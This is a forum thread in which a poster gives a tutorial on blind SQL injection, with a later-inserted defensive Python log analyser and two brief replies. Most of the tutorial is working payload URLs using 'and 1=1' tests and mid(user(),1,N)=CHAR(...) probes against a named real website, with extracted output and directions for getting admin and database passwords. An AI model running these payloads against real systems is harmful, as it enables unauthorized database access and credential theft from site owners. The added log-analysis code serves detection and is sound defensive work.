[tutorials] Sql Injection 4 version (Blind Sql)

badwolves1986
Newbie
Posts: 6
Joined: 15 Oct 2011, 07:22

[tutorials] Sql Injection 4 version (Blind Sql)

Post by badwolves1986 »

Before the tutorial itself, a little credit: I thank GT_portnoy, whose tutorial I already love.

let's talk about Blind SQL Injection ..

So what exactly is Blind SQL Injection?

Blind SQL Injection is a technique for exploiting databases that differs from common SQL injection: ordinary SQL injection returns a value, while blind SQL injection does not return any value, so we find the values by trial and error, testing whether each value is true or false...

Here we use the command:

mid() = almost the same function as substring()
char() = is a character variable

Remember: before trying this, check the SQL version (how to check it is in the other SQL injection tutorial).
If it is version 4 we use blind, because v4 does not support querying information_schema.

If it is version 5, this method may be used, or normal SQL injection may be used.

more ...

Target: http://www.smanti.com (given to me by brother gt_portnoy and brother bejamz, thank you; I love doing the experiment)

1. BUG TESTING

As usual, follow the previous steps as in the usual SQL injection tutorial: look for a dynamic page and append and 1=0 and and 1=1

http://www.smanti.com/berita.php?id=5 and 1=0 <<< false

http://www.smanti.com/berita.php?id=5 and 1=1 <<< true

so it contains the bug, eh...

continued ....

2. BLIND INJECT

Query in use: and mid(user(),1,1)=CHAR(65)

I explain a little bit ..

mid(user(),1,1) = in this case we do not know the value of the user, so the "()" is left empty, and the numbers behind it, 1,1, are the positions of the values

whereas CHAR is the variable in decimal and (65) is the decimal value.
Why do we start with 65?
Because "65" is "A" in ASCII...

continued ..

let us enter

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

but the result is still false (the story disappears)

meaning we entered the wrong value..

so we increase the value.. like so..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) << still false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) << still false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) << still false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) << false as well..

and so on until we find a true state (the story appears again)

it happened to be at char(83)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) << finally true..

Tired? Still going strong? hahaha.. trial and error...

continued ..

I add the value..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

was there any difference?

yep, we raise the number on the user to 2 and add a char value again, starting from 65..

1,1 = first value of user
1,2 = second value of user
1,3 = third value of user
etc.
and 83 is true, so we add..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

etc... until it is true..

the true value was hiding at 77

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


continue the steps..

looking for the 3rd value of user..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

got it directly, eh.. hehehe.. look

next, the 4th value..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

look, the value turns out to be 78..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

and so on...

I'm tired..


.. anyway.. after we have them all, convert the char values using the ASCII table at

http://www.piclist.com/techref/ascii.htm

after converting, it turns out 83 77 65 78 in ASCII is SMAN

so we have almost guessed his user name; do the rest yourself, ok... okay

so.. what about the password?

we change the value
user() to database() and repeat the above steps to get all the true values..

so

http://www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

the same search again, like looking for the user.. you have to be patient..

repeat until it is true..

add the value

and change the database() value to look for other values..

to get the admin password and db password.

Blind SQL injection like this requires patience and thoroughness from the attacker to hit the nail on the head.. the (true) value

However, this method is up to now quite effective on web sites that filter SQL injection... hehehe...

source: http://devilzc0de.org/forum/thread-11395.html
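Added here as an editor's example (not part of the original post or of the forum): a small Python log analyser that spots the probe sequence described in the post in web server access logs, using constructed sample lines, and reconstructs what a prober confirmed by comparing each response size against the "and 1=1" baseline. The log format, client IPs and response sizes are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style log sample (not from the original post); the query
# strings mirror the and-1=1 / mid(user(),1,N)=char(...) probe sequence above.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Oct/2011:07:30:01 +0700] "GET /berita.php?id=5%20and%201=0 HTTP/1.1" 200 2140
203.0.113.7 - - [15/Oct/2011:07:30:03 +0700] "GET /berita.php?id=5%20and%201=1 HTTP/1.1" 200 5820
203.0.113.7 - - [15/Oct/2011:07:30:09 +0700] "GET /berita.php?id=5%20and%20mid(user(),1,1)=char(65) HTTP/1.1" 200 2140
203.0.113.7 - - [15/Oct/2011:07:30:11 +0700] "GET /berita.php?id=5%20and%20mid(user(),1,1)=char(83) HTTP/1.1" 200 5820
203.0.113.7 - - [15/Oct/2011:07:30:20 +0700] "GET /berita.php?id=5%20and%20mid(user(),1,2)=char(83,65) HTTP/1.1" 200 2140
203.0.113.7 - - [15/Oct/2011:07:30:40 +0700] "GET /berita.php?id=5%20and%20mid(user(),1,4)=char(83,77,65,78) HTTP/1.1" 200 5820
198.51.100.2 - - [15/Oct/2011:07:31:00 +0700] "GET /berita.php?id=5 HTTP/1.1" 200 5820
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')
BOOL_RE = re.compile(r'\band\s+1\s*=\s*(?P<v>[01])\b', re.I)  # the "and 1=0" / "and 1=1" bug test
PROBE_RE = re.compile(  # mid(fn(),1,N)=char(c1,c2,...) as used step by step in the post
    r'\bmid\s*\(\s*(?P<fn>\w+)\s*\(\s*\)\s*,\s*1\s*,\s*\d+\s*\)\s*=\s*char\s*\((?P<codes>[\d\s,]+)\)', re.I)


def analyze(log_text):
    """Per client IP: count boolean tests and mid()/char() probes, and reconstruct
    what the prober learned. The 'and 1=1' response size is the TRUE baseline; a
    probe whose response has that size is a confirmed guess (the story appears)."""
    clients = defaultdict(lambda: {"bool_tests": 0, "probes": 0, "true_size": None, "leaked": {}})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        c = clients[m["ip"]]
        query = unquote_plus(m["path"].partition("?")[2])  # decode %20 etc. before matching
        size = int(m["size"])
        b = BOOL_RE.search(query)
        if b:
            c["bool_tests"] += 1
            if b["v"] == "1":
                c["true_size"] = size
        p = PROBE_RE.search(query)
        if p:
            c["probes"] += 1
            if c["true_size"] is not None and size == c["true_size"]:
                prefix = "".join(chr(int(x)) for x in p["codes"].split(","))
                fn = p["fn"].lower()
                if len(prefix) > len(c["leaked"].get(fn, "")):
                    c["leaked"][fn] = prefix  # longest confirmed prefix, e.g. user() -> "SMAN"
    return {ip: c for ip, c in clients.items() if c["bool_tests"] or c["probes"]}
```

Run `analyze(SAMPLE_LOG)` to get one record per probing client; a non-empty "leaked" entry tells the defender which function's value was confirmed, and how far, before the requests were blocked.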

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Re: [tutorials] Sql Injection 4 version (Blind Sql)

Post by ayu »

Was this placed in the pending section first?

In case it wasn't, make sure you read the forum description carefully next time : )

//moved
"The best place to hide a tree, is in a forest"

Lundis
Distorter of Reality
Posts: 543
Joined: 22 Aug 2008, 16:00
Location: Deadlock of Awesome

Re: [tutorials] Sql Injection 4 version (Blind Sql)

Post by Lundis »

This reminds me very much of spam emails. #-o
